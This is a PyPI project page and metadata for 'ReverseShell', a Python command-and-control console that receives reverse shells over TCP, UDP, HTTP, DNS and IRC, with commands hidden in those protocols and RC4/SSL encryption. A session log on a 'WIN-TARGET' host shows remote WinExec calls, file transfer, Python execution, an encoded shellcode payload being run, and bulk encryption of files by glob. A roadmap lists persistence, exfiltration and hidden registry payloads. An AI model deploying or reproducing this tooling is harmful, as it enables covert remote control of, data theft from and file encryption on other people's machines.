![ReverseShell logo](https://mauricelambert.github.io/info/python/security/ReverseShell_small.png "ReverseShell logo")
# ReverseShell
## Description
This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).
### Version 0.0.X - POC
- Support basic reverse shell using netcat or other standard/basic reverse shell
- Basic terminal features
- Commands history
- UDP
- Multi-sessions TCP (1 session/1 command)
- Encrypt TCP data with SSL
- Encrypt commands with RC4
- Hide commands with IRC protocol
- Hide commands with DNS (UDP) protocol
- Hide commands with HTTP protocol
- Advanced terminal features (required specific packets):
- Print colored hostname, user and current directory
- Auto-completion (executables in PATH and files in current directory)
- Updatable any time you send the specific packet
- Auto-restart for TCP client
- Very large TCP packet (greater than TCP Window) is working
- Check if command exists (only with advanced reverse shell features)
### Version 0.1.X - Dev
- Builtins command
- Update environment
- Current directory
- Files/Executables
- Encryption key
- Compression algorithm
- Gzip, Lzma, Bz2, Zlib
- Data encoding
- Bases: 16, 32, 64 85
- Upload and download file (optional compression)
- Download file from URL
- Code execution (for the python POC it's a python execution) (optional compression)
- Shellcode runner (optional compression)
- Single/Multiple file(s) encryption/decryption with parallelism (multi-processing) (multiple encryption support glob syntax)
- Archive files (useful to download mutliples files with only one command)
- Call DLL or shared object functions (for example to use Win32 API)
- Update encryption key with random value
- New encryption is based on the precedent encryption, without all of the precedents keys you can't decrypt data
### Version 1.0.X - TODO
- Auto install (in memory and/or saved on the disk)
- From basic reverse shell
- From protocols
- WMI (impacket plugin ?)
- SMB (impacket plugin ?)
- Persistence
- Data exfiltration
- Saved hidden payloads (for examples in Windows logs or registry)
- Spawn TTY for Linux
- Download multiples files on another temp socket (for parallelism, useful to export lot of data)
- Waiting to execute command after receive it (using `Beep`, *socket timeout*, `Sleep`, *child process, async worker or thread end*, `print`)
- Thread instead of process
### Examples
You can read multiples POC for reverse shell client written in python in the *clients* directory.
I add public and private key for default SSL certificate, is useful for test but **is not secure, create your own certificate to protect your TCP data**.
## Requirements
This package require :
- python3
- python3 Standard Library
- PythonToolsKit
## Installation
```bash
pip install ReverseShell
```
## Usages
### Command lines
```bash
python3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k "abcd" # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.
```
### Python3
```python
from ReverseShell import ReverseShellSocketTcp, ReverseShell
with ReverseShellSocketTcp(address=("127.0.0.1", 1337), ssl=False, cert=None, key=None, handler=ReverseShell) as shellserver:
shellserver.serve_forever()
# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
from ReverseShell import ReverseShellTcp, HttpReverseShell, partial
with ReverseShellTcp(address=("127.0.0.1", 1337), ssl=True, cert="server.crt", key="server.key", handler=partial(HttpReverseShell, key=b"abcd", encoding="utf-8")) as shellserver:
shellserver.serve_forever()
# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
```
### ReverseShell builtins commands
```
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ update_environment
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$
```
## Screenshots
![ReverseShell](https://mauricelambert.github.io/info/python/security/ReverseShell.png "ReverseShell")
## Contributions
You are welcome to contribute ! Beginner, intermediate and advanced developpers can contribute to this repository. Python developpers, system administrators, network administrators, web developpers and compiled language developpers can contribute. See the [issues](https://github.com/mauricelambert/ReverseShell/issues) to know what we need.
## Links
- [Github Page](https://github.com/mauricelambert/ReverseShell)
- [Pypi](https://pypi.org/project/ReverseShell/)
- [Documentation](https://mauricelambert.github.io/info/python/security/ReverseShell.html)
- [Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.pyz)
- [Windows Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.exe)
- [Binaries shell clients](https://github.com/mauricelambert/ReverseShell/releases/latest)
## Help
```text
usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
[--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]
Advanced reverse shell console.
options:
-h, --help show this help message and exit
--udp, -u Use UDP socket.
--tcp, -t Use TCP socket.
--multi-tcp, -T Create TCP socket for each command and responses.
--http, -H Use HTTP requests and responses.
--dns, -d Use DNS requests and responses.
--irc, -I Use IRC requests and response.
--no-color, --color, -C
Do not use color
--key KEY, -k KEY Add a key to encrypt with RC4.
--cert CERT, -c CERT SSL cert file.
--private PRIVATE, -P PRIVATE
SSL private key file.
--ip IP, -i IP IP address to start the ReverseShell server.
--port PORT, -p PORT UDP/TCP port to start the ReverseShell server.
--encoding ENCODING, -e ENCODING
The reverse shell encoding used by client.
--ssl, -s Use SSL over TCP socket.
--no-timeout, -m Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
reverse shell like netcat.
```
## Licence
Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
Raw data
{
"_id": null,
"home_page": "https://github.com/mauricelambert/ReverseShell",
"name": "ReverseShell",
"maintainer": "Maurice Lambert",
"docs_url": null,
"requires_python": ">=3.8",
"maintainer_email": "mauricelambert434@gmail.com",
"keywords": "ReverseShell,terminal,console,netcat,HTTP,IRC,DNS,TCP,UDP",
"author": "Maurice Lambert",
"author_email": "mauricelambert434@gmail.com",
"download_url": "https://files.pythonhosted.org/packages/af/a3/2028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a/ReverseShell-0.1.0.tar.gz",
"platform": "Windows",
"description": "![ReverseShell logo](https://mauricelambert.github.io/info/python/security/ReverseShell_small.png \"ReverseShell logo\")\n\n# ReverseShell\n\n## Description\n\nThis package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).\n\n### Version 0.0.X - POC\n\n - Support basic reverse shell using netcat or other standard/basic reverse shell\n - Basic terminal features\n - Commands history\n - UDP\n - Multi-sessions TCP (1 session/1 command)\n - Encrypt TCP data with SSL\n - Encrypt commands with RC4\n - Hide commands with IRC protocol\n - Hide commands with DNS (UDP) protocol\n - Hide commands with HTTP protocol\n - Advanced terminal features (required specific packets):\n - Print colored hostname, user and current directory\n - Auto-completion (executables in PATH and files in current directory)\n - Updatable any time you send the specific packet\n - Auto-restart for TCP client\n - Very large TCP packet (greater than TCP Window) is working\n - Check if command exists (only with advanced reverse shell features)\n\n### Version 0.1.X - Dev\n\n - Builtins command\n - Update environment\n - Current directory\n - Files/Executables\n - Encryption key\n - Compression algorithm\n - Gzip, Lzma, Bz2, Zlib\n - Data encoding\n - Bases: 16, 32, 64 85\n - Upload and download file (optional compression)\n - Download file from URL\n - Code execution (for the python POC it's a python execution) (optional compression)\n - Shellcode runner (optional compression)\n - Single/Multiple file(s) encryption/decryption with parallelism (multi-processing) (multiple encryption support glob syntax)\n - Archive files (useful to download mutliples files with only one command)\n - Call DLL or shared object functions (for example to use Win32 API)\n - Update encryption key with random value\n - New encryption is based on the precedent encryption, without all of the precedents keys you can't decrypt data\n\n### Version 1.0.X - TODO\n\n - Auto install (in memory and/or saved on the disk)\n - From basic reverse shell\n - From protocols\n - WMI (impacket plugin ?)\n - SMB (impacket plugin ?)\n - Persistence\n - Data exfiltration\n - Saved hidden payloads (for examples in Windows logs or registry)\n - Spawn TTY for Linux\n - Download multiples files on another temp socket (for parallelism, useful to export lot of data)\n - Waiting to execute command after receive it (using `Beep`, *socket timeout*, `Sleep`, *child process, async worker or thread end*, `print`)\n - Thread instead of process\n\n### Examples\n\nYou can read multiples POC for reverse shell client written in python in the *clients* directory.\n\nI add public and private key for default SSL certificate, is useful for test but **is not secure, create your own certificate to protect your TCP data**.\n\n## Requirements\n\nThis package require :\n - python3\n - python3 Standard Library\n - PythonToolsKit\n\n## Installation\n\n```bash\npip install ReverseShell\n```\n\n## Usages\n\n### Command lines\n\n```bash\npython3 -m ReverseShell --help\npython3 ReverseShell.pyz -h\nReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.\nReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.\nReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.\nReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.\nReverseShell -H -T -s -k \"abcd\" # To test this command use the \"shellclienthttpsencrypt_advanced.py abcd\" command. This is an advanced HTTPS encrypted (using RC4 with \"abcd\" key) reverse shell.\nReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.\nReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.\nReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.\nReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.\n```\n\n### Python3\n\n```python\nfrom ReverseShell import ReverseShellSocketTcp, ReverseShell\n\nwith ReverseShellSocketTcp(address=(\"127.0.0.1\", 1337), ssl=False, cert=None, key=None, handler=ReverseShell) as shellserver:\n shellserver.serve_forever()\n\n# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.\n\nfrom ReverseShell import ReverseShellTcp, HttpReverseShell, partial\n\nwith ReverseShellTcp(address=(\"127.0.0.1\", 1337), ssl=True, cert=\"server.crt\", key=\"server.key\", handler=partial(HttpReverseShell, key=b\"abcd\", encoding=\"utf-8\")) as shellserver:\n shellserver.serve_forever()\n\n# To test this command use the \"shellclienthttpsencrypt_advanced.py abcd\" command. This is an advanced HTTPS encrypted (using RC4 with \"abcd\" key) reverse shell.\n```\n\n### ReverseShell builtins commands\n\n```\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ call_library_function kernel32.dll WinExec \"char *:calc.exe\" \"long:1\"\nReturn value: 33\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ archive_files test.zip *.md *.key\nMaking archive...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ download_url http://google.com test.html\nDone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ cd ..\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ update_environment\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ upload_file shellcode.py shellcode2.py\n['shellcode.py', 'shellcode2.py']\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ download_file shellcode2.py\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ python3_exec print('qwerty')\nqwerty\nNone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ upload_file_compress shellcode.py shellcode2.py\n['shellcode.py', 'shellcode2.py']\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ download_file_compress shellcode2.py\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ python3_exec_compress print('qwerty')\nqwerty\nNone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==\n\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==\n\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_file test.html\n[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.\n[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_file qwerty test.html\nEncryption is running...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ decrypt_file qwerty test.html\nDecryption is running...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_files qwerty *.html *.zip\nEncryption is running...\n[*] 2 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ decrypt_files qwerty *.html *.zip\nDecryption is running...\n[*] 2 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$\n```\n\n## Screenshots\n\n![ReverseShell](https://mauricelambert.github.io/info/python/security/ReverseShell.png \"ReverseShell\")\n\n## Contributions\n\nYou are welcome to contribute ! Beginner, intermediate and advanced developpers can contribute to this repository. Python developpers, system administrators, network administrators, web developpers and compiled language developpers can contribute. See the [issues](https://github.com/mauricelambert/ReverseShell/issues) to know what we need.\n\n## Links\n\n - [Github Page](https://github.com/mauricelambert/ReverseShell)\n - [Pypi](https://pypi.org/project/ReverseShell/)\n - [Documentation](https://mauricelambert.github.io/info/python/security/ReverseShell.html)\n - [Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.pyz)\n - [Windows Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.exe)\n - [Binaries shell clients](https://github.com/mauricelambert/ReverseShell/releases/latest)\n\n## Help\n\n```text\nusage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]\n [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]\n\nAdvanced reverse shell console.\n\noptions:\n -h, --help show this help message and exit\n --udp, -u Use UDP socket.\n --tcp, -t Use TCP socket.\n --multi-tcp, -T Create TCP socket for each command and responses.\n --http, -H Use HTTP requests and responses.\n --dns, -d Use DNS requests and responses.\n --irc, -I Use IRC requests and response.\n --no-color, --color, -C\n Do not use color\n --key KEY, -k KEY Add a key to encrypt with RC4.\n --cert CERT, -c CERT SSL cert file.\n --private PRIVATE, -P PRIVATE\n SSL private key file.\n --ip IP, -i IP IP address to start the ReverseShell server.\n --port PORT, -p PORT UDP/TCP port to start the ReverseShell server.\n --encoding ENCODING, -e ENCODING\n The reverse shell encoding used by client.\n --ssl, -s Use SSL over TCP socket.\n --no-timeout, -m Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic\n reverse shell like netcat.\n```\n\n## Licence\n\nLicensed under the [GPL, version 3](https://www.gnu.org/licenses/).\n",
"bugtrack_url": null,
"license": "GPL-3.0 License",
"summary": "This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).",
"version": "0.1.0",
"project_urls": {
"Documentation": "https://mauricelambert.github.io/info/python/security/ReverseShell.html",
"Executable": "https://mauricelambert.github.io/info/python/security/ReverseShell.pyz",
"Homepage": "https://github.com/mauricelambert/ReverseShell"
},
"split_keywords": [
"reverseshell",
"terminal",
"console",
"netcat",
"http",
"irc",
"dns",
"tcp",
"udp"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "afa32028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a",
"md5": "8a119e803e1d131efa77f93d30e405c0",
"sha256": "b68021bc2877f574b74d47e273a034645302cd1a4f8ddb83b5294aba2eff228f"
},
"downloads": -1,
"filename": "ReverseShell-0.1.0.tar.gz",
"has_sig": false,
"md5_digest": "8a119e803e1d131efa77f93d30e405c0",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.8",
"size": 46208,
"upload_time": "2023-05-27T15:23:03",
"upload_time_iso_8601": "2023-05-27T15:23:03.896941Z",
"url": "https://files.pythonhosted.org/packages/af/a3/2028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a/ReverseShell-0.1.0.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-05-27 15:23:03",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "mauricelambert",
"github_project": "ReverseShell",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"lcname": "reverseshell"
}